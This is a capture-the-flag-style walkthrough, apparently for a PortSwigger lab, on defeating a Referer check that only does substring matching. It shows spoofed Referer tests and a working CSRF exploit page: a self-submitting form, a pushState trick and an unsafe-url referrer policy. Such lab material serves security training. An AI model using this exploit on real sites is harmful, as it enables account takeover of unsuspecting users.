[This app](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses/lab-referer-validation-broken) checks the `Referer` header for its own domain, but only does a **substring match**, not a proper origin check. You can spoof the Referer by using **any domain** and just tacking the lab domain into the query string — and override browser behavior to make sure that Referer is sent **with the full URL**. ##### Step 1: Analyze the Referer Check 1. Log in as `wiener:peter` and change your email 2. In **Burp → Proxy**, send the request to **Repeater** 3. Try: ```http Referer: https://evil.com → ❌ Rejected ``` 4. Try: ```http Referer: https://evil.com?YOUR-LAB-ID.web-security-academy.net → ✅ Accepted ``` ✔️ Server only checks if its domain is **somewhere** in the string → **substring match = weak** --- ##### Step 2: Build the CSRF Exploit Create on Exploit Server: ```html <form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="[email protected]"> </form> <script> history.pushState("", "", "/?YOUR-LAB-ID.web-security-academy.net"); document.forms[0].submit(); </script> ``` 🧠 This makes the Referer look like: ```http Referer: https://exploit-server.com/?YOUR-LAB-ID.web-security-academy.net ``` --- ##### Step 3: Ensure Full Referer is Sent By default, browsers **strip the query string** from the Referer header. Fix this with: ```http Referrer-Policy: unsafe-url ``` ➡ This **must be added in the "Head" section** on the Exploit Server: ```html <head> <meta name="referrer" content="unsafe-url"> </head> ``` Or using the server UI: set header name `Referrer-Policy` and value `unsafe-url` --- ##### Step 4: Final Steps 1. Update email to something not already used, e.g. `[email protected]` 2. Store the exploit 3. Click **Deliver to victim** 4. Check that the lab is marked as solved ✅